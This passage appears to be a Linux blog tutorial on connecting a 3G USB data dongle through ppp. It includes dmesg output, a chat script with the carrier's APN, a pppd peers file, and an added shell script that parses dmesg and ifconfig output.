    [81619.971069] usb 1-1: New USB device found, idVendor=2077, idProduct=f000
    [81619.971084] usb 1-1: New USB device strings: Mfr=3, Product=2, SerialNumber=4
    [81619.971094] usb 1-1: Product: 3G DataCard Modem
    [81619.971102] usb 1-1: Manufacturer: 
    [81619.971110] usb 1-1: SerialNumber: 352767040228502
    [81619.994861] scsi12 : usb-storage 1-1:1.0
    [81620.994486] scsi 12:0:0:0: CD-ROM 3G Modem Mass Storage 2.31 PQ: 0 ANSI: 2
    [81621.001861] sr0: scsi-1 drive
    [81621.003113] sr 12:0:0:0: Attached scsi CD-ROM sr0
    [81621.004581] sr 12:0:0:0: Attached scsi generic sg1 type 5
    [81621.216695] usb 1-1: USB disconnect, device number 14
    [81621.584119] usb 1-1: new high-speed USB device number 15 using ehci_hcd
    [81621.719506] usb 1-1: New USB device found, idVendor=2077, idProduct=9000
    [81621.719521] usb 1-1: New USB device strings: Mfr=3, Product=2, SerialNumber=4
    [81621.719531] usb 1-1: Product: 3G DataCard Modem
    [81621.719539] usb 1-1: Manufacturer: 
    [81621.719547] usb 1-1: SerialNumber: 352767040228502
    [81621.743255] option 1-1:1.0: GSM modem (1-port) converter detected
    [81621.743644] usb 1-1: GSM modem (1-port) converter now attached to ttyUSB0
    [81621.744665] option 1-1:1.1: GSM modem (1-port) converter detected
    [81621.745025] usb 1-1: GSM modem (1-port) converter now attached to ttyUSB1
    [81621.745644] scsi13 : usb-storage 1-1:1.2
    [81621.746458] option 1-1:1.3: GSM modem (1-port) converter detected
    [81621.746869] usb 1-1: GSM modem (1-port) converter now attached to ttyUSB2
    [81622.746052] scsi 13:0:0:0: Direct-Access 3G Modem Mass Storage 2.31 PQ: 0 ANSI: 2
    [81622.750890] sd 13:0:0:0: Attached scsi generic sg1 type 0
    [81622.754045] sd 13:0:0:0: [sdb] Attached SCSI removable disk

    Now we know that the device uses the following /dev entries: ttyUSB0, ttyUSB1 & ttyUSB2. (This dongle is a composite device made up of multiple functions: the PPP/modem adapter, the USB adapter and a storage module; note in the dmesg output that it first shows up as a CD-ROM with idProduct=f000, disconnects, and then re-enumerates as a modem with idProduct=9000.)

  5. Run 'nano /etc/chatscripts/3g' (this file shouldn't exist yet)
  6. Enter the following details:
    ABORT BUSY
    ABORT 'NO CARRIER'
    ABORT ERROR
    REPORT CONNECT
    "" \rAT
    OK 'AT+CGDCONT=1,"IP","UPC.dataxs.mobi"'
    OK ATD*99***1#
    CONNECT ""
  7. Run 'nano /etc/ppp/peers/hsdpa-provider' (this file shouldn't exist yet either)
  8. Enter the following details:
    /dev/ttyUSB2
    115200
    crtscts
    local
    noipdefault
    defaultroute
    usepeerdns
    noauth
    passive
    connect "/usr/sbin/chat -v -f /etc/chatscripts/3g"
    user test
    ipcp-accept-remote
    ipcp-accept-local

    So far it seems that a username/password is not required to make the connection, so I used test as the username.

  9. Run 'pon hsdpa-provider'
  10. Wait a few seconds until you see that the green light on your USB dongle has stopped flashing and stays on continuously
  11. Run 'ifconfig -a' and check that there is a PPP interface listed

If all is well you should have received an IP address and be able to connect to the internet :)

    ppp0      Link encap:Point-to-Point Protocol
              inet addr:10.*.*.*  P-t-P:10.*.*.*  Mask:255.255.255.255
              UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1500  Metric:1
              RX packets:8 errors:0 dropped:0 overruns:0 frame:0
              TX packets:9 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:3
              RX bytes:158 (158.0 B)  TX bytes:221 (221.0 B)
  • To connect, run 'pon hsdpa-provider'
  • To disconnect, run 'poff hsdpa-provider'
  • I believe these commands aren't too easy to remember, so I made 2 files in /usr/bin called 3g-on and 3g-off with these commands inside them.

Don't forget to chmod +x these files if you do the same…
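A few shell helpers that apply the checks from steps 3, 4 and 11 to captured output, so you can see at a glance which USB id the dongle ended up with, which ttyUSB port to put in the peers file and whether ppp0 actually got an address. This is an added example, not code from the original post; the sample dmesg and ifconfig text is constructed from the lines shown above, with made-up addresses.

```shell
#!/bin/sh
# Added example, not code from the original post: helpers that pull the
# modem's USB id and serial ports out of dmesg output and confirm that a ppp
# interface came up with an address. The samples are constructed from the
# lines shown in the post; on a real machine pipe `dmesg` / `ifconfig -a` in.

# Constructed dmesg excerpt: the dongle first enumerates as f000 (CD-ROM),
# then re-enumerates as 9000 and the option driver attaches three ports.
SAMPLE_DMESG='[81619.971069] usb 1-1: New USB device found, idVendor=2077, idProduct=f000
[81621.719506] usb 1-1: New USB device found, idVendor=2077, idProduct=9000
[81621.743644] usb 1-1: GSM modem (1-port) converter now attached to ttyUSB0
[81621.745025] usb 1-1: GSM modem (1-port) converter now attached to ttyUSB1
[81621.746869] usb 1-1: GSM modem (1-port) converter now attached to ttyUSB2
[81622.754045] sd 13:0:0:0: [sdb] Attached SCSI removable disk'

# Constructed ifconfig excerpt for a connected ppp0 (addresses made up).
SAMPLE_IFCONFIG='ppp0      Link encap:Point-to-Point Protocol
          inet addr:10.1.2.3  P-t-P:10.64.64.64  Mask:255.255.255.255
          UP POINTOPOINT RUNNING NOARP MULTICAST  MTU:1500  Metric:1'

# Print the last vendor:product id the kernel reported, i.e. the id after
# the dongle has switched from storage mode to modem mode.
usb_id() {
    sed -n 's/.*idVendor=\([0-9a-f]*\), idProduct=\([0-9a-f]*\).*/\1:\2/p' | tail -n 1
}

# Print every /dev name the option driver attached, one per line, in order.
modem_ports() {
    sed -n 's|.*converter now attached to \(ttyUSB[0-9]*\).*|/dev/\1|p'
}

# Print the port to put in /etc/ppp/peers/hsdpa-provider: the post uses the
# last one the driver reports (ttyUSB2), so take the last line.
data_port() {
    modem_ports | tail -n 1
}

# Print the local address of the named ppp interface; return 1 if the
# interface is missing or has no address (i.e. pon did not get a link).
ppp_addr() {
    iface="$1"
    addr=$(awk -v want="$iface" '
        $1 == want { found = 1; next }
        found && /inet addr:/ { sub(/.*inet addr:/, ""); sub(/ .*/, ""); print; exit }
        found && /^[^ ]/ { exit }')
    [ -n "$addr" ] || return 1
    printf '%s\n' "$addr"
}

# Stand-alone run on the constructed samples.
printf 'usb id:    %s\n' "$(printf '%s\n' "$SAMPLE_DMESG" | usb_id)"
printf 'data port: %s\n' "$(printf '%s\n' "$SAMPLE_DMESG" | data_port)"
printf 'ppp0 addr: %s\n' "$(printf '%s\n' "$SAMPLE_IFCONFIG" | ppp_addr ppp0)"
```

On a live box, `dmesg | data_port` and `ifconfig -a | ppp_addr ppp0 || echo 'no link'` give the same checks against real output.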

Something worth mentioning about this configuration…
On line 6 of /etc/chatscripts/3g we entered the line:

OK 'AT+CGDCONT=1,"IP","UPC.dataxs.mobi"'

The last part (UPC.dataxs.mobi) is the PPP authentication server (APN); this might be different for you!
To check your auth. server, connect and install the device in Windows and look at the connection settings/options.

Coming soon, sending (free) SMS text messages using this device :)



1) look into Electric IMP